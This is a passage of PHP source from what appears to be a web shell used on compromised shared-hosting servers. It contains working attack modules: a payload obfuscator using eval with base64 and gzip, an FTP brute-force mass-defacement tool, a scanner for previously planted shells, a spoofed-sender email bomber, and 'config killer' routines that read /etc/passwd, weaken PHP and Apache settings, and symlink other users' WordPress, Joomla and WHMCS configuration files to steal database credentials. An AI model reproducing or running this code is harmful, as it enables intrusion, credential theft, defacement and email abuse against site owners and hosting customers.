  4155. <tr><td>Design</td><td>Andripzf</td></tr>
  4156. <tr><td>Adding &#x45;&#x78;&#x70;&#x6C;&#x6F;&#x69;&#x74;</td><td>Andripzf</td></tr>
  4157. <tr><td>Basic Shell</td><td>b374k m1n1 PHP Shell</td></tr><tr>
  4158. <td>Bypass Symlink</td><td>Thanks to Mauritania, Mr.Alasaek,Lagripe-Dz, PakCyber, BD Cyber Army</td></tr><tr>
  4159. <td>Whmcs &#x45;&#x78;&#x70;&#x6C;&#x6F;&#x69;&#x74;</td><td>Thanks to Rab3oun, g00n, theMaster,Lagripe-Dz, X3group</td></tr>
  4160. <tr><td>WP &#x45;&#x78;&#x70;&#x6C;&#x6F;&#x69;&#x74;</td><td>Thanks to XTTG, Lagripe-Dz</td></tr>
  4161. <tr><td>Joomla &#x45;&#x78;&#x70;&#x6C;&#x6F;&#x69;&#x74;</td><td>Thanks to XTTG, Lagripe-Dz</td></tr>
  4162. <tr><td>VB &#x45;&#x78;&#x70;&#x6C;&#x6F;&#x69;&#x74;</td><td>Thanks to Tryag</td></tr>
  4163. <tr><td>&#x43;&#x6F;&#x6E;&#x66;&#x69;&#x67;&#x20;&#x4B;&#x69;&#x6C;&#x6C;&#x65;&#x72;&#x20;&#x45;&#x78;&#x70;&#x6C;&#x6F;&#x69;&#x74;</td><td>&#x54;&#x68;&#x61;&#x6E;&#x6B;&#x73;&#x20;&#x74;&#x6F;&#x20;&#x49;&#x6E;&#x64;&#x69;&#x73;&#x68;&#x65;&#x6C;&#x6C;&#x2C;&#x20;&#x41;&#x6E;&#x6F;&#x6E;&#x67;&#x68;&#x6F;&#x73;&#x74;&#x2C;&#x20;&#x4C;&#x61;&#x67;&#x72;&#x69;&#x70;&#x65;&#x2D;&#x44;&#x7A;&#x2C;&#x20;&#x49;&#x6E;&#x64;&#x72;&#x61;&#x6A;&#x69;&#x74;&#x68;</td></tr>
  4164. <tr><td>Security Bypass &#x45;&#x78;&#x70;&#x6C;&#x6F;&#x69;&#x74;</td><td>Thanks to Mauritania, Lagripe-Dz </td></tr>
  4165. <tr><td>Greetz To</td><td>&#x45;&#x78;&#x70;&#x6C;&#x6F;&#x69;&#x74;-DB, 1337 0day, All Moeslim Hackers And Coders In The World</td></tr>
  4166. </table></td></tr>
  4167. </table>";
  4168.  
  4169. }elseif(isset($_GET['x'])&&($_GET['x']=='coding')){
  4170. echo'<form action="?dm='.$pwd.'&amp;x=coding" method="post">';
  4171. $meth_d=$_POST['typed'];
  4172. $typ_d=$_POST['typenc'];
  4173. $c_ntent=$_POST['php_content'];
  4174. $c_ntent=$c_ntent;
  4175. switch($meth_d) {
  4176. case "Encode":
  4177. switch($typ_d) {
  4178. case "BASE64":
  4179. $res_t=chunk_split(base64_encode(trim(stripslashes($c_ntent),'<?php,?>')));
  4180. $res_t="<?php eval(gzinflate(base64_decode(\"$res_t\"))); ?>";
  4181. break;
  4182. case "GZINFLATE":
  4183. $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '), '<?php, ?>'), 9));
  4184. $res_t="<?php eval(gzinflate(base64_decode(\"$res_t\"))); ?>";
  4185. break;
  4186. case "GZUNCOMPRESS":
  4187. $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '), '<?php, ?>'), 9));
  4188. $res_t="<?php eval(gzuncompress(base64_decode(\"$res_t\"))); ?>";
  4189. break;
  4190. case "STR_ROT13":
  4191. $res_t=trim(stripslashes($c_ntent.' '), '<?php, ?>');
  4192. $res_t=base64_encode(str_rot13($res_t));
  4193. $res_t="<?php eval(str_rot13(base64_decode(\"$res_t\"))); ?>";
  4194. break;
  4195. }
  4196. break;
  4197. case "Decode":
  4198. switch($typ_d) {
  4199. case "BASE64":
  4200. $res_t=base64_decode($c_ntent);
  4201. break;
  4202. case "GZINFLATE":
  4203. $res_t=gzinflate(base64_decode($c_ntent));
  4204. break;
  4205. case "GZUNCOMPRESS":
  4206. $res_t=gzuncompress(base64_decode($c_ntent));
  4207. break;
  4208. case "STR_ROT13":
  4209. $res_t=str_rot13(base64_decode($c_ntent));
  4210. break;
  4211. }
  4212. break;
  4213. }
  4214. echo"<center><table class='cmdbox' style='border-collapse: collapse'>
  4215. <tr><td align='center'><b><span class='b7'>O=:[ ENCODE & DECODE ]:=O</span></b></tr></td>
  4216. <tr><td align='center'>Method: <select name='typed'><option value='Encode'>Encode</option><option value='Decode'>Decode</option></select></td></tr>
  4217. <tr><td align='center'>TYPE: <select name='typenc'><option value='BASE64'>Base64</option><option value='GZINFLATE'>Gzinflate</option><option value='GZUNCOMPRESS'>Gzuncompress</option><option value='STR_ROT13'>Str Rot13</option></tr></td>
  4218. <tr><td align='center'>
  4219. <textarea spellcheck='false' name='php_content' onclick='this.focus();this.select();'>".htmlentities($c_ntent)."</textarea></td></tr>
  4220. <tr><td align='center'><input type='submit'></td></tr>";
  4221. if($res_t){
  4222. echo"<tr><td align='center'><textarea spellcheck='false' onclick='this.focus();this.select();'>".htmlspecialchars($res_t)."</textarea></td></tr>";
  4223. }
  4224. echo"</table></center></form>";
  4225. }elseif(isset($_GET['x'])&&($_GET['x']=='cp2')){
  4226. echo'<form action="?dm='.$pwd.'&amp;x=cp2" method="post">
  4227. <br/><br/><center><b><span class="b7">O=:[ FTP MASS DEFACE ]:=O</span></b><br/><br/>
  4228. <form method="post">
  4229. <center>
  4230. IP Server:<input type="text" name="ip" value="127.0.0.1" />
  4231. <p>&nbsp;</p>
  4232. User\'s List:<br>
  4233. <textarea rows="10" style="width:35%;" name="users" value="The Users List"></textarea>
  4234. <p>&nbsp;</p>
  4235. Password\'s List:<br>
  4236. <textarea rows="10" style="width:35%;" name="passwords" value="The Password List"></textarea>
  4237. <p>&nbsp;</p>
  4238. Index File Name:<input type="text" name="index_name" value="index.php" /><br>
  4239. <p>&nbsp;</p>
  4240. Index File Link:<input type="text" name="index_link" value="index.txt" /><br>
  4241. <p>&nbsp;</p>
  4242. <input type="submit" name="forest" value="Mass Deface it" /><br><br>
  4243. </form></center>';
  4244.  
  4245. if(isset($_POST['forest'])) {
  4246. $ip=trim($_POST['ip']);
  4247. $users=explode("\n",$_POST["users"]);
  4248. $passwords=explode("\n",$_POST["passwords"]);
  4249. $index_name=trim($_POST['index_name']);
  4250. $index_link=trim($_POST['index_link']);
  4251. foreach($users as $user) {
  4252. foreach($passwords as $pass) {
  4253. $connect_ip=ftp_connect($ip)or die("Couldn't Connect To $ip");
  4254. if(@ftp_login($connect_ip, trim($user), trim($pass))) {
  4255. echo "<br>Connected To --> $ip@$user\n";
  4256. @ftp_delete($connect_ip,$index_name);
  4257. $deface=ftp_put($connect_ip, "/public_html/".$index_name,$index_link, FTP_ASCII);
  4258. if($deface) {
  4259. echo "<br><font color=green> $user --> Deface Success!!</font>";
  4260. break;
  4261. }else{
  4262. echo "<br><font color=red> $user --> Error Defacing!!</font>";
  4263. }
  4264. }else{
  4265. echo "<br><font color=red>Couldn't Connect To --> $ip@$user --> $pass</font>\n";
  4266. }
  4267. }
  4268. }
  4269. echo "<br><font size=5> ! Mass Defacing Was Done ! </font>";
  4270. }
  4271. }elseif(isset($_GET['x'])&&($_GET['x']=='sscan')){
  4272. echo"<form action=\"?dm=$pwd&amp;x=sscan\" method=\"post\">
  4273. <br><br><center> <b><span class='b7'>O=:[ SHELL SCANNER ]:=O</span></b><br/><br/>
  4274. <table border='1' cellspacing='3' style='border:1px solid #7d7676;border-collapse: collapse'>
  4275. <tr><td align=center colspan=3 style='color:red;border:1px solid #7d7676;'>URL TARGET:<input type='text' size='40' name='rem_web' value='http://'></td></tr>
  4276. <tr><td align=center colspan=3 style='color:red;border:1px solid #7d7676;'>INPUT NAMA FILE / SHELL</tr></td>
  4277. <tr><td align=center colspan=3 style='border:1px solid #7d7676;'>
  4278. <textarea spellcheck='false' class='textarea_edit' name='tryzzz'>WSO.php\ndz.php\ncpanelcracker.php\nblackshadow.php\nsym.php\nftpcracker.php\ncpanel.php\ncpn.php\nsql.php\nmysql.php\nmadspot.php\nitsecteam_shell.php\nb374k.php\nmadsopot.php\nindishell.php\nCgishell.pl\nkiller.php\nchangeall.php\n2.php\nSh3ll.php\ndz0.php\ndam.php\nuser.php\ndom.php\nwhmcs.php\nr00t.php\nc99.php\ngaza.php\nq.php\n1.php\nd0mains.php\nmadspotshell.php\nSym.php\nc22.php\nc100.php\nCpanel.php\nzone-h.php\ncp.php\nL3b.php\nd.php\nadmin1.php\nupload.php\nup.php\nuploads.php\nsa.php\nr57.php\nshell.php\nsa.php</textarea>
  4279. </td></tr>
  4280. <tr><td align=center colspan=3><input type='submit' name='lol' value=' SCAN ' class='input_big' /></td></tr></form>";
  4281. $rtr=array();
  4282. $webz=$_POST['rem_web'];
  4283. if(isset($_POST['lol'])) {
  4284. $uri_in=$_POST['tryzzz'];
  4285. $r_xuri=explode("\n",$uri_in);
  4286. for($i=0; $i<count($r_xuri); $i++) {
  4287. if($r_xuri[$i]) {
  4288. $urlzzx=$webz . trim($r_xuri[$i]);
  4289. $status_code=is_url_exist($urlzzx);
  4290. if($status_code==true) {
  4291. echo "<tr><td style='text-align:left;color:lime;border:1px solid #7d7676;'>Checking </td><td style='color:lime;border:1px solid #7d7676;'><a style='color:lime;' target='_blank' href='$urlzzx'>$urlzzx</a></td>\n";
  4292. echo "<td style='text-align:left;color:lime;border:1px solid #7d7676;'> Found....</td></tr>\n";
  4293. }else{
  4294. echo "<tr><td style='text-align:left;color:red;border:1px solid #7d7676;'>Checking </td><td style='color:red;border:1px solid #7d7676;'>$urlzzx</td>\n";
  4295. echo "<td style='text-align:left;color:red;border:1px solid #7d7676;'>Not Found...</td></tr>\n";
  4296. }
  4297. }
  4298. }
  4299. }
  4300. echo "</table>\n";
  4301. }elseif(isset($_GET['x'])&&($_GET['x']=='bomail')){
  4302. if(isset($_POST['bom'])) {
  4303. $dm=$_POST['dm'];
  4304. $wew=$_POST['wew'];
  4305. $wow=$_POST['wow'];
  4306. $sodok=$_POST['sodok'];
  4307. $anu=$_POST['anu'];
  4308. $deathnote=$_POST['deathnote'];
  4309. if(empty($wow)){
  4310. echo"<script>alert('email korbannya mana ?');</script>";
  4311. }else{
  4312. if($dm=="dm"){
  4313. for($i=0; $i<$sodok; $i++){
  4314. $a=$wew;
  4315. $janda=$anu.$i;
  4316. if(mail($wow,$janda,$deathnote.str_repeat(" ",0*$xdm),"From: $a <$a>\r\n")){
  4317. echo "<script>alert('Bom mail ".$sodok." sukses dikirim ke ".$wow." ayo bom lagi');</script>";
  4318. }else{
  4319. echo"<script>alert('Email gagal di kirim');</script>";
  4320. }
  4321. }
  4322. }
  4323. }
  4324. }
  4325. echo'<form action="?y='.$pwd.'&amp;x=bomail" method="post">
  4326. <center>
  4327. <br>
  4328. <b><span class=\'b7\'> --=|[+] BOMB FAKE EMAIL [+]|=--</span></b></center>
  4329. <input type=hidden value="dm" name="dm"><br />
  4330. <center><span style="color:#00FF00">-:[ X-EMAIL ]:-</span><br/>
  4331. <span style="color:white">**Isi Dengan Nama Email Palsu**<br/>
  4332. <input type=text name=wew value="'.$_SERVER["SERVER_ADMIN"].'"></center>
  4333. <br/>
  4334. <center><span style="color:#00FF00">-:[ EMAIL TUJUAN ]:-</span><br/>
  4335. <span style="color:white">**Isi Email Target Bomb Email**</span><br/>
  4336. <input type=text name=wow value="'.$wow.'"></center>
  4337. <br/>
  4338. <center><span style="color:#00FF00">-:[ SUBJECT ]:-</span> <br/>
  4339. <span style="color:white">**Isi Nama Judul Pesan**</span><br/>
  4340. <input type=text name=anu value="'.$anu.'>"></center>
  4341. <br/>
  4342. <center><span style="color:#00FF00">-:[ JUMLAH KIRIM ]:-</span><br/>
  4343. <span style="color:white">**Isi Nominal Antara 0 s/d 100**</span><br/>
  4344. <input type=text name=sodok value="'.$sodok.'"></center>
  4345. <br/>
  4346. <center><span style="color:#00FF00">-:PESAN ]:-</span><br/>
  4347. <span style="color:white">**Tulis Pesan Kamu**</span><br/>
  4348. <textarea name="deathnote">'.htmlentities($deathnote).'</textarea><br/>
  4349. <p>
  4350. <input type="submit" name="bom"></center></form>';
  4351.  
  4352. }elseif(isset($_GET['x'])&&($_GET['x']=='plesk')){
  4353. echo'<form action="?dm='.$pwd.'&amp;x=plesk" method="post">';
  4354. mkdir('plesk',0777);
  4355. $hta="Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php";
  4356. $htaccess=@fopen('plesk/.htaccess','w');
  4357. fwrite($htaccess,$hta);
  4358. symlink("/","plesk/dm.txt");
  4359. }elseif(isset($_GET['x'])&&($_GET['x']=='apache')){
  4360. echo'<form action="?dm='.$pwd.'>&amp;x=apache" method="post">
  4361. <body bgcolor=black><center><br/><br/> <img src="http://silk.apana.org.au/graphics/apache_logo.gif">
  4362. <form method=post><br/><br/>
  4363. <b><span class="b7">O=:[ APACHE TOOLS ]:=O</span></b><br/><br/>
  4364. <p><input type=submit name="usre" value="EXTRACT USER" /></form><br/><br/><br/>';
  4365. if(isset($_POST['usre'])){
  4366. echo'<form method=post>
  4367. <textarea name=user>';
  4368. $users=file("/etc/passwd");
  4369. foreach($users as $user){
  4370. $str=explode(":",$user);
  4371. echo $str[0]."\n";
  4372. }
  4373. echo'</textarea><br><br>
  4374. <input type=submit name=su value="EXECUTE" /></form><br/>';
  4375. }
  4376. if(isset($_POST['su'])){
  4377. mkdir('dm',0777);
  4378. $rr="Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddType text/plain .html\nAddType text/plain .bak\nAddType text/plain .old\nAddHandler server-parsed .php\nAddHandler txt .html\nRequire None\nSatisfy Any";
  4379. $g=fopen('dm/.htaccess','w');
  4380. fwrite($g,$rr);
  4381. $dm=symlink("/","dm/dm.txt");
  4382. $rt="<a href=dm/dm.txt><b><span class='b11'>[ SYMLINK ]</span></b></a>";
  4383. echo "[~]&nbsp;";
  4384. echo "$rt";
  4385. $dir=mkdir('DM',0777);
  4386. $r="Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddType text/plain .html\nAddType text/plain .bak\nAddType text/plain .old\nAddHandler server-parsed .php\nAddHandler txt .html\nRequire None\nSatisfy Any";
  4387. $f=fopen('DM/.htaccess','w');
  4388. fwrite($f,$r);
  4389. $consym="<a href=DM/><b><span class='b11'>[ CONFIG KILLER ]</span></b> </a>";
  4390. echo "&nbsp;[~]&nbsp;";
  4391. echo "$consym";
  4392. echo "&nbsp;[~]";
  4393. $usr=explode("\n",$_POST['user']);
  4394. $configuration=array("aksi.php","aksi.php.old","aksi.php.bak","conf.php","conf.php.old","conf.php.bak","conf_global.php","conf_global.php.old","conf_global.php.bak","config.php","config.php.old","config.php.bak","configuration.php","configuration.php.old","configuration.php.bak","conn.php","conn.php.old","conn.php.bak","connect.php","connect.php.old","connect.php.bak","connection.php","connection.php.old","connection.php.bak","db.php","db.php.old","db.php.bak","database.php","database.php.old","database.php.bak","inc.php","inc.php.old","inc.php.bak","koneksi.php","koneksi.php.old","koneksi.php.bak","mysql.php","myqsl.php.old","mysql.php.bak","setting.php","setting.php.old","setting.php.bak","Settings.php","Settings.php.old","Settings.php.bak","sql.php","sql.php.old","sql.php.bak");
  4395. foreach($usr as $uss){
  4396. $us=trim($uss);
  4397. foreach($configuration as $c){
  4398. $rs="/home/".$us."/public_html/".$c;
  4399. $r="DM/".$us."~".$c;
  4400. symlink($rs,$r);
  4401. }
  4402. }
  4403. }
  4404. }elseif(isset($_GET['x'])&&($_GET['x']=='hostgator')){
  4405. echo'<form action="?dm='.$pwd.'&amp;x=hostgator" method="post">
  4406. <body bgcolor=black><center><br/><br/><img src="http://partnernoc.cpanel.net/logo/822-4021-logo.png">
  4407. <form method=post><br/><br/>
  4408. <b><span class="b7">O=:[ HOSTGATOR TOOLS ]:=O</span></b><br/><br/>
  4409. <p><input type=submit name="usre" value="EXTRACT USER" /></form><br/><br/><br/>';
  4410. if(isset($_POST['usre'])){
  4411. echo'<form method="post">
  4412. <textarea name="user">';
  4413. $users=file("/etc/passwd");
  4414. foreach($users as $user){
  4415. $str=explode(":",$user);
  4416. echo $str[0]."\n";
  4417. }
  4418. echo'</textarea><br><br>
  4419. <input type=submit name=su value="./EXECUTE" /></form><br/>';
  4420. }
  4421. if(isset($_POST['su'])){
  4422. mkdir('hostgator',0777);
  4423. $r="Options +FollowSymLinks \n DirectoryIndex Sux.html \n Options +Indexes \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain.html ";
  4424. $g=fopen('hostgator/.htaccess','w');
  4425. fwrite($g,$rr);
  4426. $dm=symlink("/","hostgator/dm.ini");
  4427. $rt="<a href=hostgator/dm.ini><b><span class='b11'>[ SYMLINK ]</span></b></a>";
  4428. echo "[~]&nbsp;";
  4429. echo "$rt";
  4430. $dir=mkdir('HOSTGATOR',0777);
  4431. $rr="Safe_mode = OFF \n Disable_functions = NONE \n Open_basedir = OFF";
  4432. $f=fopen('HOSTGATOR/php.ini','w');
  4433. fwrite($f,$rr);
  4434. $rrr="Options +FollowSymLinks \n DirectoryIndex Sux.html \n Options +Indexes \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain.html ";
  4435. $ff=fopen('HOSTGATOR/.htaccess','w');
  4436. fwrite($ff,$rrr);
  4437. $consym="<a href=HOSTGATOR/><span class='b11'>[ CONFIG KILLER ]</span></b></a>";
  4438. echo "&nbsp;[~]&nbsp;";
  4439. echo "$consym";
  4440. echo "&nbsp;[~]";
  4441. $usr=explode("\n",$_POST['user']);
  4442. $configuration=array("wp-config.ini","wordpress/wp-config.ini","configuration.ini","blog/wp-config.ini","joomla/configuration.ini","vb/includes/config.ini","includes/config.ini","conf_global.ini","inc/config.ini","config.ini","Settings.ini","sites/default/settings.ini","whm/configuration.ini","whmcs/configuration.ini","support/configuration.ini","whmc/WHM/configuration.ini","whm/WHMCS/configuration.ini","whm/whmcs/configuration.ini","support/configuration.ini","clients/configuration.ini","client/configuration.ini","clientes/configuration.ini","cliente/configuration.ini","clientsupport/configuration.ini","billing/configuration.ini","admin/config.ini");
  4443. foreach($usr as $uss){
  4444. $us=trim($uss);
  4445. foreach($configuration as $c){
  4446. $rs="/home/".$us."/public_html/".$c;
  4447. $r="HOSTGATOR/".$us."~".$c;
  4448. symlink($rs,$r);
  4449. }
  4450. }
  4451. }
  4452. }elseif(isset($_GET['x'])&&($_GET['x']=='limehost')){
  4453. echo'<form action="?dm=<?php echo $pwd; ?>&amp;x=limehost" method="post">
  4454. <body bgcolor=black>
  4455. <center><br/><br/>
  4456. <img src="http://www.ananova.com/wp-content/uploads/2013/04/limehost-review-by-toptenhostings.jpg">
  4457. <form method=post><br/><br/><b><span class="b7">O=:[ BLUEHOST TOOLS ]:=O</span></b><br/><br/>
  4458. <p><input type=submit name="usre" value="EXTRACT USER" /></form><br/><br/><br/>';
  4459. if(isset($_POST['usre'])){
  4460. echo'<form method="post">
  4461. <textarea name="user">';
  4462. $users=file("/etc/passwd");
  4463. foreach($users as $user){
  4464. $str=explode(":",$user);
  4465. echo $str[0]."\n";
  4466. }
  4467. echo'</textarea><br><br>
  4468. <input type=submit name=su value="./EXECUTE" /></form><br/>';
  4469. }
  4470. echo "<font color=white size=2 face=\"comic sans ms\">";
  4471. if(isset($_POST['su'])){
  4472. mkdir('limehost',0777);
  4473. $rr="AllowOverride All None \nDirectoryIndex index.html index.htm index.php index.php4 index.php5 \n AddType application/octet-stream .php \nAddHandler server-parsed .php \nAddhandler cgi-script .asp \nAddType ini .php \nAddHandler ini .php";
  4474. $g=fopen('limehost/.htaccess','w');
  4475. fwrite($g,$rr);
  4476. $dm=symlink("/","limehost/dm.ini");
  4477. $rt="<a href=limehost/dm.ini><b><span class='b11'>[ SYMLINK ]</span></b></a>";
  4478. echo "[~]&nbsp;";
  4479. echo "$rt";
  4480. $dir=mkdir('BLUEHOST',0777);
  4481. $r="Options all \n DirectoryIndex Sux.html \nAddType text/plain .php \nAddHandler server-parsed .php \nAddType text/plain .html \nAddHandler txt .html \nRequire None \nSatisfy Any";
  4482. $f=fopen('BLUEHOST/.htaccess','w');
  4483. fwrite($f,$r);
  4484. $consym="<a href=BLUEHOST/><span class='b11'>[ CONFIG KILLER ]</span></b></a>";
  4485. echo "&nbsp;[~]&nbsp;";
  4486. echo "$consym";
  4487. echo "&nbsp;[~]";
  4488. $usr=explode("\n",$_POST['user']);
  4489. $configuration=array("wp-config.ini","wordpress/wp-config.ini","configuration.ini","blog/wp-config.ini","joomla/configuration.ini","vb/includes/config.ini","includes/config.ini","conf_global.ini","inc/config.ini","config.ini","Settings.ini","sites/default/settings.ini","whm/configuration.ini","whmcs/configuration.ini","support/configuration.ini","whmc/WHM/configuration.ini","whm/WHMCS/configuration.ini","whm/whmcs/configuration.ini","support/configuration.ini","clients/configuration.ini","client/configuration.ini","clientes/configuration.ini","cliente/configuration.ini","clientsupport/configuration.ini","billing/configuration.ini","admin/config.ini");
  4490. foreach($usr as $uss){
  4491. $us=trim($uss);
  4492. foreach($configuration as $c){
  4493. $rs="/home/".$us."/public_html/".$c;
  4494. $rs="/home1/".$us."/public_html/".$c;
  4495. $rs="/home2/".$us."/public_html/".$c;
  4496. $rs="/home3/".$us."/public_html/".$c;
  4497. $rs="/home4/".$us."/public_html/".$c;
  4498. $rs="/home5/".$us."/public_html/".$c;
  4499. $rs="/home6/".$us."/public_html/".$c;
  4500. $rs="/home7/".$us."/public_html/".$c;
  4501. $rs="/home8/".$us."/public_html/".$c;
  4502. $r="BLUEHOST/".$us."~".$c;
  4503. symlink($rs,$r);
  4504. }
  4505. }
  4506. }
  4507. }elseif(isset($_GET['x'])&&($_GET['x']=='ovh')){
  4508. echo'<form action="?dm='.$pwd.'&amp;x=ovh" method="post">
  4509. <body bgcolor=black><center><br/><br/><img src="http://alsace-international.eu/IMG/LOGOS/Entreprises/OVH_Logo.gif">
  4510. <form method=post><br/><br/>
  4511. <b><span class="b7">O=:[ OVH TOOLS ]:=O</span></b><br/><br/>
  4512. <p><input type=submit name="usre" value="EXTRACT USER" /></form><br/><br/><br/>';
  4513. if(isset($_POST['usre'])){
  4514. echo'<form method="post"><textarea name="user">';
  4515. $users=file("/etc/passwd");
  4516. foreach($users as $user){
  4517. $str=explode(":",$user);
  4518. echo $str[0]."\n";
  4519. }
  4520. echo'</textarea><br><br>
  4521. <input type=submit name=su value="./EXECUTE" /></form><br/>';
  4522. }
  4523. if(isset($_POST['su'])){
  4524. mkdir('ovh',0777);
  4525. $r="AllowOverride All None\nDirectoryIndex index.html index.htm index.php index.php4 index.php5 \n AddType application/octet-stream .php \nAddHandler server-parsed .php \nAddhandler cgi-script .asp \nAddType ini .php \nAddHandler ini .php";
  4526. $g=fopen('ovh/.htaccess','w');
  4527. fwrite($g,$rr);
  4528. $dm=symlink("/","ovh/dm.ini");
  4529. $rt="<a href=ovh/dm.ini><b><span class='b11'>[ SYMLINK ]</span></b></a>";
  4530. echo "[~]&nbsp;";
  4531. echo "$rt";
  4532. $dir=mkdir('OVH',0777);
  4533. $rr="Safe_mode = OFF \n Disable_functions = NONE \n Open_basedir = OFF";
  4534. $f=fopen('OVH/php.ini','w');
  4535. fwrite($f,$rr);
  4536. $rrr="AllowOverride All None \nDirectoryIndex index.html index.htm index.php index.php4 index.php5 \n AddType application/octet-stream .php \nAddHandler server-parsed .php \nAddHandler cgi-script .asp \nAddType ini .php \nAddHandler ini .php";
  4537. $ff=fopen('OVH/.htaccess','w');
  4538. fwrite($ff,$rrr);
  4539. $consym="<a href=OVH/><span class='b11'>[ CONFIG KILLER ]</span></b></a>";
  4540. echo "&nbsp;[~]&nbsp;";
  4541. echo "$consym";
  4542. echo "&nbsp;[~]";
  4543. $usr=explode("\n",$_POST['user']);
  4544. $configuration=array("wp-config.ini","wordpress/wp-config.ini","configuration.ini","blog/wp-config.ini","joomla/configuration.ini","vb/includes/config.ini","includes/config.ini","conf_global.ini","inc/config.ini","config.ini","Settings.ini","sites/default/settings.ini","whm/configuration.ini","whmcs/configuration.ini","support/configuration.ini","whmc/WHM/configuration.ini","whm/WHMCS/configuration.ini","whm/whmcs/configuration.ini","support/configuration.ini","clients/configuration.ini","client/configuration.ini","clientes/configuration.ini","cliente/configuration.ini","clientsupport/configuration.ini","billing/configuration.ini","admin/config.ini");
  4545. foreach($usr as $uss){
  4546. $us=trim($uss);
  4547. foreach($configuration as $c){
  4548. $rs="/homez.0/".$us."/www/".$c;
  4549. $rs="/homez.1/".$us."/www/".$c;
  4550. $rs="/homez.2/".$us."/www/".$c;
  4551. $rs="/homez.3/".$us."/www/".$c;
  4552. $rs="/homez.4/".$us."/www/".$c;
  4553. $rs="/homez.5/".$us."/www/".$c;
  4554. $rs="/homez.6/".$us."/www/".$c;
  4555. $rs="/homez.7/".$us."/www/".$c;
  4556. $rs="/homez.8/".$us."/www/".$c;
  4557. $rs="/homez.9/".$us."/www/".$c;
  4558. $rs="/homez.10/".$us."/www/".$c;
  4559. $rs="/homez.11/".$us."/www/".$c;
  4560. $rs="/homez.12/".$us."/www/".$c;
  4561. $rs="/homez.13/".$us."/www/".$c;
  4562. $rs="/homez.14/".$us."/www/".$c;
  4563. $rs="/homez.15/".$us."/www/".$c;
  4564. $rs="/homez.16/".$us."/www/".$c;
  4565. $rs="/homez.17/".$us."/www/".$c;
  4566. $rs="/homez.18/".$us."/www/".$c;
  4567. $rs="/homez.19/".$us."/www/".$c;
  4568. $rs="/homez.20/".$us."/www/".$c;
  4569. $rs="/homez.21/".$us."/www/".$c;
  4570. $rs="/homez.22/".$us."/www/".$c;
  4571. $rs="/homez.23/".$us."/www/".$c;
  4572. $rs="/homez.24/".$us."/www/".$c;
  4573. $rs="/homez.25/".$us."/www/".$c;
  4574. $rs="/homez.26/".$us."/www/".$c;
  4575. $rs="/homez.27/".$us."/www/".$c;
  4576. $rs="/homez.28/".$us."/www/".$c;
  4577. $rs="/homez.29/".$us."/www/".$c;
  4578. $rs="/homez.30/".$us."/www/".$c;
  4579. $rs="/homez.31/".$us."/www/".$c;
  4580. $rs="/homez.32/".$us."/www/".$c;
  4581. $rs="/homez.33/".$us."/www/".$c;
  4582. $rs="/homez.34/".$us."/www/".$c;
  4583. $rs="/homez.35/".$us."/www/".$c;
  4584. $rs="/homez.36/".$us."/www/".$c;
  4585. $rs="/homez.37/".$us."/www/".$c;
  4586. $rs="/homez.38/".$us."/www/".$c;
  4587. $rs="/homez.39/".$us."/www/".$c;
  4588. $rs="/homez.40/".$us."/www/".$c;
  4589. $rs="/homez.41/".$us."/www/".$c;
  4590. $rs="/homez.42/".$us."/www/".$c;
  4591. $rs="/homez.43/".$us."/www/".$c;
  4592. $rs="/homez.44/".$us."/www/".$c;
  4593. $rs="/homez.45/".$us."/www/".$c;
  4594. $rs="/homez.46/".$us."/www/".$c;
  4595. $rs="/homez.47/".$us."/www/".$c;
  4596. $rs="/homez.48/".$us."/www/".$c;
  4597. $rs="/homez.49/".$us."/www/".$c;
  4598. $rs="/homez.50/".$us."/www/".$c;
  4599. $rs="/homez.51/".$us."/www/".$c;
  4600. $rs="/homez.52/".$us."/www/".$c;
  4601. $rs="/homez.53/".$us."/www/".$c;
  4602. $rs="/homez.54/".$us."/www/".$c;
  4603. $rs="/homez.55/".$us."/www/".$c;
  4604. $rs="/homez.56/".$us."/www/".$c;
  4605. $rs="/homez.57/".$us."/www/".$c;
  4606. $rs="/homez.58/".$us."/www/".$c;
  4607. $rs="/homez.59/".$us."/www/".$c;
  4608. $rs="/homez.60/".$us."/www/".$c;
  4609. $rs="/homez.61/".$us."/www/".$c;
  4610. $rs="/homez.62/".$us."/www/".$c;
  4611. $rs="/homez.63/".$us."/www/".$c;
  4612. $rs="/homez.64/".$us."/www/".$c;
  4613. $rs="/homez.65/".$us."/www/".$c;
  4614. $rs="/homez.66/".$us."/www/".$c;
  4615. $rs="/homez.67/".$us."/www/".$c;
  4616. $rs="/homez.68/".$us."/www/".$c;
  4617. $rs="/homez.69/".$us."/www/".$c;
  4618. $rs="/homez.70/".$us."/www/".$c;
  4619. $rs="/homez.71/".$us."/www/".$c;
  4620. $rs="/homez.72/".$us."/www/".$c;
  4621. $rs="/homez.73/".$us."/www/".$c;
  4622. $rs="/homez.74/".$us."/www/".$c;
  4623. $rs="/homez.75/".$us."/www/".$c;
  4624. $rs="/homez.76/".$us."/www/".$c;
  4625. $rs="/homez.77/".$us."/www/".$c;
  4626. $rs="/homez.78/".$us."/www/".$c;
  4627. $rs="/homez.79/".$us."/www/".$c;
  4628. $rs="/homez.80/".$us."/www/".$c;
  4629. $rs="/homez.81/".$us."/www/".$c;
  4630. $rs="/homez.82/".$us."/www/".$c;
  4631. $rs="/homez.83/".$us."/www/".$c;
  4632. $rs="/homez.84/".$us."/www/".$c;
  4633. $rs="/homez.85/".$us."/www/".$c;
  4634. $rs="/homez.86/".$us."/www/".$c;
  4635. $rs="/homez.87/".$us."/www/".$c;
  4636. $rs="/homez.88/".$us."/www/".$c;
  4637. $rs="/homez.89/".$us."/www/".$c;
  4638. $rs="/homez.100/".$us."/www/".$c;
  4639. $rs="/homez.101/".$us."/www/".$c;
  4640. $rs="/homez.102/".$us."/www/".$c;
  4641. $rs="/homez.103/".$us."/www/".$c;
  4642. $rs="/homez.104/".$us."/www/".$c;
  4643. $rs="/homez.105/".$us."/www/".$c;
  4644. $rs="/homez.106/".$us."/www/".$c;
  4645. $rs="/homez.107/".$us."/www/".$c;
  4646. $rs="/homez.108/".$us."/www/".$c;
  4647. $rs="/homez.109/".$us."/www/".$c;
  4648. $rs="/homez.110/".$us."/www/".$c;
  4649. $rs="/homez.111/".$us."/www/".$c;
  4650. $rs="/homez.112/".$us."/www/".$c;
  4651. $rs="/homez.113/".$us."/www/".$c;
